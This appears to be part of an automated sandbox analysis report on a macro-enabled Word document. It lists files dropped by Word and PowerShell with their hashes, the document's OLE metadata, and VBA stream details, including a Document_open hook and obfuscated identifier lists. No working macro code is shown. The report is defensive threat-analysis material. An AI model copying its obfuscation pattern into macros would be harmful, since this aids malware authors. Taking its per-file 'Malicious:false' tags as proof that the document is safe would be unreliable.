                                            SHA1:58F488B15562AFFDE61710ADEEAF74FAC1BCD538
                                            SHA-256:71F6D0539A61B2460763F125A844BB5AA0601F8E1B5CC38A1562F62D25E0A9EA
                                            SHA-512:11086359F402B1649EA7DFD9DAB157FCA75FB9D718DFDB122B54CC43633E3BC8BE7576456D8740349D3CC0826E4E7AFACD63E3F53B5BCD8D410A043AB2CE2F39
                                            Malicious:false
                                            Reputation:low
                                            Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\Cab788B.tmp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):59134
                                            Entropy (8bit):7.995450161616763
                                            Encrypted:true
                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                            C:\Users\user\AppData\Local\Temp\Tar788C.tmp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):152788
                                            Entropy (8bit):6.316654432555028
                                            Encrypted:false
                                            SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                            MD5:64FEDADE4387A8B92C120B21EC61E394
                                            SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                            SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                            SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                            C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162688
                                            Entropy (8bit):4.254427543033798
                                            Encrypted:false
                                            SSDEEP:1536:C6F/3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CYtNSc83tKBAvQVCgOtmXmLpLm4l
                                            MD5:B75724FCB4E76EBF63DBCDF7612FC119
                                            SHA1:7C17F2418772BAAED48E5506F1F8AC846FBBFA30
                                            SHA-256:584E3002D3D0FAE1CE129F6ACAA0C46A7AB2BCE8AE3B36F98703F1C0B56F232B
                                            SHA-512:DDA441FC9C209FA0C64657FBE1CC828E8CCA5350C7466989E80C9CEC7443E7FF6B3041B27929E09138D79F931030D75C80CF914A0E3BC0A680A9F65F3F834920
                                            Malicious:false
                                            Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):74
                                            Entropy (8bit):4.060710299033871
                                            Encrypted:false
                                            SSDEEP:3:M1blG+kLtCLs+kLtCmX1blG+kLtCv:MrG+kLtys+kLtzG+kLts
                                            MD5:D9D81D211C7D3FE392C07C615275BBC8
                                            SHA1:D0AFA7424E42C91595D6AF3178CEB8118A742FC4
                                            SHA-256:8CA00953A5C409D8B6B2344A7DCD452A1A25A1F94E1034B2504919FFD123A8EB
                                            SHA-512:FC4541A6A37F0D5AB6861417F2B68131D9C0C9708F3D413353EF11E71A721AE00E1F78BB0C78CAE1FB16DDCE2F39F86C75D780A9FDA863AF28301064F9B1A65C
                                            Malicious:false
                                            Preview: [doc]..v22Pc0qA.doc.LNK=0..v22Pc0qA.doc.LNK=0..[doc]..v22Pc0qA.doc.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v22Pc0qA.doc.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Feb 2 06:17:33 2021, mtime=Tue Feb 2 06:17:33 2021, atime=Tue Feb 2 06:17:36 2021, length=207360, window=hide
                                            Category:dropped
                                            Size (bytes):2048
                                            Entropy (8bit):4.527876837802699
                                            Encrypted:false
                                            SSDEEP:24:8KQzpq/XTwz6Id2pdeEqDv3q3dM7dD2KQzpq/XTwz6Id2pdeEqDv3q3dM7dV:8JFq/XT3IwdPJ3Qh2JFq/XT3IwdPJ3Q/
                                            MD5:5446B895630089FCED67C28088FADEC7
                                            SHA1:BCC01829E557F5E5FBFD25BB80EA101900974D77
                                            SHA-256:4780B9075645E765B879672F5489FB8E4739B56EA16AF51D7BB70CC14A58FAD1
                                            SHA-512:2767EA529D4EF4AD403AA51F7E3250E21E96C63A2B0EB525B4464017F4D77B3D73EB7B8640CBAC06122A045D222880C1EC3A52E487C135EBD72C9EB6C615009E
                                            Malicious:false
                                            Preview: L..................F.... ......y3......y3.....D{3....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....BR1:..Desktop.d......QK.XBR1:*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2..*..BR3: .V22PC0~1.DOC..N......BR1:BR1:*...?.....................v.2.2.P.c.0.q.A...d.o.c...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\414408\Users.user\Desktop\v22Pc0qA.doc.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.v.2.2.P.c.0.q.A...d.o.c...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......414408..........D_....3N...W...9F.C...........[D_....3N...W
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VS2UV89W85XGVX955105.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.587928372793151
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqaqvsqvJCwo5z8hQCsMqaqvsEHyqvJCworXz1PYXH6f8ImlUVjIu:cyzo5z8ynHnorXz13f8IhIu
                                            MD5:3F4EF43F42C0D4B94BFE3ECAB2F814FC
                                            SHA1:1395EAC13F983A7320D7761424C9EDA4B3B71CB2
                                            SHA-256:AF180C76A745AF34EF2BBBC596E3AC3A0D9C83E98AB86DA4CE685B7AAE4ED436
                                            SHA-512:59FC36D5D5EA0F574416A3259BEBE8C6A20A7A25BAA81296ECB1BAAB95073CEF75DB22DB010A4AF030B6D8CB0F69AABF893681A92CEA9DD28FCAFD70EEAAD4C0
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\Desktop\~$2Pc0qA.doc.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: extensible Automotive generate withdrawal Wooden Global architecture, Author: Chlo Gerard, Template: Normal.dotm, Last Saved By: Thomas Roussel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 13:51:00 2020, Last Saved Time/Date: Mon Dec 21 13:51:00 2020, Number of Pages: 1, Number of Words: 5943, Number of Characters: 33877, Security: 8
                                            Entropy (8bit):6.406111255633529
                                            TrID:
                                            • Microsoft Word document (32009/1) 54.23%
                                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                            File name:v22Pc0qA.doc.doc
                                            File size:207253
                                            MD5:7a7d325948481b0557b035249bf5c96a
                                            SHA1:0529727ffad8388fc94155d1652ca65189cda5df
                                            SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919
                                            SHA512:45cf99bad712aaace79010c728705117fc12ac76d76f625716115a19477ce40de5d18ecaca8e84ea55c388d4436d4827ab63c660df86dcdc01c5c8ce975dda44
                                            SSDEEP:3072:MD9ufstRUUKSns8T00JSHUgteMJ8qMD7g5bkxU7PoU2l65gsaTs:Y9ufsfgIf0pLkU7PoU2lIgsaTs
                                            File Content Preview:........................>.......................9...........<...............6...7...8..........................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "v22Pc0qA.doc.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:extensible Automotive generate withdrawal Wooden Global architecture
                                            Author:Chlo Gerard
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:Thomas Roussel
                                            Revion Number:1
                                            Total Edit Time:0
                                            Create Time:2020-12-21 13:51:00
                                            Last Saved Time:2020-12-21 13:51:00
                                            Number of Pages:1
                                            Number of Words:5943
                                            Number of Characters:33877
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:1252
                                            Number of Lines:282
                                            Number of Paragraphs:79
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:983040

                                            Streams with VBA

                                            VBA File Name: UserForm1, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm1
                                            VBA File Name:UserForm1
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            False
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm2, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm2
                                            VBA File Name:UserForm2
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm3, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm3
                                            VBA File Name:UserForm3
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_GlobalNameSpace
                                            VBA Code
                                            VBA File Name: UserForm4, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm4
                                            VBA File Name:UserForm4
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_Base
                                            VBA Code
                                            VBA File Name: UserForm5, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm5
                                            VBA File Name:UserForm5
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: Dk5att0cu_9jsb, Stream Size: 1114
                                            General
                                            Stream Path:Macros/VBA/Dk5att0cu_9jsb
                                            VBA File Name:Dk5att0cu_9jsb
                                            Stream Size:1114
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . T 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 11 c0 54 37 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_Customizable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: Lxvinhyq0hu0i, Stream Size: 16887
                                            General
                                            Stream Path:Macros/VBA/Lxvinhyq0hu0i
                                            VBA File Name:Lxvinhyq0hu0i
                                            Stream Size:16887
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 1f 30 00 00 00 00 00 00 01 00 00 00 11 c0 34 97 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            "cBBImVFtj.VfOyHcZeG.KTQGJQv"
                                            MVKdEA
                                            "iYrsMDeBF.SIoiFJ.zdnAB"
                                            "cfmqZH.yHFfXEyD.iUezXEC"
                                            TFhBESFIX
                                            yqztDCl:
                                            VBA.Replace
                                            jSGTCFaK:
                                            hVRJE
                                            "HGXMmlZoZ.jEXaTVE.zeocvMGG"
                                            RZyrFJ
                                            sbVXlJE:
                                            aDFRF
                                            KAedr
                                            "ObyEHIBL.hGKABcIQ.yeYrFAOmg"
                                            RMyrFd
                                            qLfbCLdC
                                            GLxLQDxBB
                                            KiOKSNEG:
                                            PrigNJEs
                                            nCWvB
                                            RhecDCNb:
                                            YaqiI
                                            yDuIa
                                            aDFRF:
                                            Binary
                                            hckCCJvD:
                                            UbSMfKFUj
                                            CtmaxWDYG
                                            dcClB:
                                            VipWJ:
                                            jSGTCFaK
                                            IpXGAFACy
                                            jWIUH
                                            yqztDCl
                                            "aguCEDpx.XlUcBUj.UPogGhX"
                                            "zSasAJg.LDOIU.vvZOFJ"
                                            "AtMXEHJGF.tPVXDfJI.vNeXEIF"
                                            wVgZExzI
                                            "gtvUAW.KeNGGlEDI.FCFXBEHbH"
                                            hkpqEBd
                                            FEJNFPMF
                                            uYPoFiE
                                            XvETIO
                                            pxMXSJrIc:
                                            dcClB
                                            VIuzQOE:
                                            "zpGvEhCHv.ZNcWIJcU.qeFzJB"
                                            "gEMlED.skZhEggk.ZyWBD"
                                            FzSmxUBI:
                                            IIJMEYBZ
                                            JubeVI
                                            "QWkiJ.sNlBSC.hsUWFP"
                                            BRfTAJ
                                            lOYxmwBA
                                            IIJMEYBZ:
                                            UFEneAQF
                                            FzOAw
                                            "eKLzaJBKG.eCACJBH.NfdiGiC"
                                            Resume
                                            iAKfBEDC:
                                            QqQRUOBIy
                                            "nRpjIJ.tkIcCAbCF.hJzbH"
                                            yHCsJFACD
                                            lfjdHL
                                            mxDIrHC
                                            hckCCJvD
                                            DxojDGC
                                            rDIcxFB:
                                            NwlcQEELI
                                            eYojg
                                            JXblRBK:
                                            kaqktK
                                            olbDbIA:
                                            nCWvB:
                                            "bfJqAKr.cLEdAF.oYWiAFEQ"
                                            lbHAbDF:
                                            ZqNrvaa:
                                            kmOCpG
                                            FoTWuD:
                                            ChrW(wdKeyS)
                                            bVAPDAD
                                            "ZbLbn.FiqyBGPC.ROWoCHF"
                                            cHoJJlDBJ
                                            "CXrJJB.OBfnW.uqEngDYV"
                                            "BpfOu.TVoTOHe.EzrPEDJ"
                                            "rqFdfCgk.WuMsFCHq.wYpcBKVBP"
                                            ObUqEpuD:
                                            NwlcQEELI:
                                            "pJlGBGe.jIXSWL.jkAfAEIf"
                                            "hSzhx.onZqBBzG.aRYCE"
                                            VB_Name
                                            AJXECAN
                                            ZxZNGGUBd:
                                            IaIuovC:
                                            WnWcBBeF
                                            IaIuovC
                                            "TNqlmI.VQzWNlJC.IuleF"
                                            gvnNjywC:
                                            "ErIlZF.tHbIE.idUJKwuOi"
                                            oVlMEI
                                            NJlsEIS
                                            JxVVF
                                            RWlYF
                                            "ZFWwdLJFE.FcQNSnyB.yuKyrJAD"
                                            "KeuGF.APuwUHxl.GiUhBFB"
                                            fGzqP:
                                            uJknJZHFB:
                                            yJzxGZak
                                            PksXIAC:
                                            "obWgmFILu.KLSrfFHDI.nylpN"
                                            "AcrzGL.zwvmHG.MqsxCr"
                                            UbSMfKFUj:
                                            kmOCpG:
                                            "XIjXFFFIJ.jYAPtLTyj.PLtLFT"
                                            Attribute
                                            lfRjBXXFA:
                                            lfRjBXXFA
                                            fGzqP
                                            VIuzQOE
                                            RMyrFd:
                                            JXblRBK
                                            YEAwF
                                            nhVWCG:
                                            "BiUfo.vtUVwAWGC.hUSLqGGIO"
                                            MVKdEA:
                                            "oScEJFIH.GpYhI.ZPvpk"
                                            iZGGBKjGH
                                            "DcfnrACC.XeVEC.QdSVCUJ"
                                            ohdoz
                                            uJtiAP
                                            "WWmJGCEWG.XCrNGJ.ficHzH"
                                            cIiApH
                                            LjVfJ
                                            qLfbCLdC:
                                            zHYrT
                                            sbVXlJE
                                            sCwjljF
                                            JHGODJK
                                            XvETIO:
                                            BrrXfI
                                            JzcNByvAX
                                            "DbRqLDGCg.nxwYCaF.sZZrJ"
                                            nmHtBKNIA
                                            uJknJZHFB
                                            kMzKEr:
                                            pxMXSJrIc
                                            "pPiJFZzI.dfizGxy.NRcSrA"
                                            KiOKSNEG
                                            SEnkGD
                                            "nYskWX.aOSpmAFIB.kCBksCD"
                                            "gjoHAq.pgiDH.iYppCzD"
                                            HMJCGGAMi
                                            "RSIiW.JGdvBjSmB.WubTFJ"
                                            xuAPcBl
                                            xuAPcBl:
                                            jJMCQJDB:
                                            nhVWCG
                                            LjVfJ:
                                            zHYrT:
                                            kMzKEr
                                            lbHAbDF
                                            "YNveE.qehAq.fHHuGb"
                                            "eHqqE.nCeMDET.kZWuQGE"
                                            ZuuLFE
                                            EhrmhuB
                                            "NhKID.SYBhRIEGg.qCLeaM"
                                            "NPkiDT.CkfBJvJ.bgnwZAB"
                                            "fNHCB.hbEBBG.feKiwC"
                                            IGamxCG
                                            ZuuLFE:
                                            jWIUH:
                                            "MiwKq.hkWsDcI.YmoTAGR"
                                            "NgFRIFlFQ.imXZAJE.tzzlC"
                                            RhecDCNb
                                            nmHtBKNIA:
                                            WpdDxhHa
                                            VipWJ
                                            PksXIAC
                                            String
                                            gvnNjywC
                                            eTuZIDG
                                            kySRBFED
                                            ObUqEpuD
                                            uWAjsYwtG
                                            FzSmxUBI
                                            YEAwF:
                                            "dcEwJD.cZCpC.kfXrIC"
                                            FEJNFPMF:
                                            "uozeDEQ.xTczzpJbJ.GKYoFkDTH"
                                            "NipqJ.tIztQI.WMXjaJ"
                                            yDuIa:
                                            IpXGAFACy:
                                            "qKjdvEDq.lYfhW.eTVwADADD"
                                            yDAMCG
                                            ZqNrvaa
                                            TLfxGCa
                                            EiViHgGI
                                            IJSGH
                                            iAKfBEDC
                                            TFhBESFIX:
                                            GwJXIC
                                            Error
                                            "dZEvHBM.HWisMo.kLMoA"
                                            "OqezBEGR.dKnPpE.XZiNID"
                                            dThRBEAv
                                            rDIcxFB
                                            JKIoD
                                            cIiApH:
                                            QyqGnByH
                                            ahjNCC
                                            yDAMCG:
                                            Close
                                            jJMCQJDB
                                            "WWgXBJbAL.psfjJF.iosTZOn"
                                            yHCsJFACD:
                                            ZxZNGGUBd
                                            Function
                                            FoTWuD
                                            hVRJE:
                                            "dCIAJyHr.uGSFGCFE.hgENI"
                                            olbDbIA
                                            OXtlEDLCd
                                            zoqaA
                                            "UqHHHBQRG.wPBFeBYHC.BFGBerA"
                                            "cklcdFF.ljzQFAII.yhDYGICo"
                                            VBA Code
                                            VBA File Name: UserForm1, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm1
                                            VBA File Name:UserForm1
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 6e ff 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

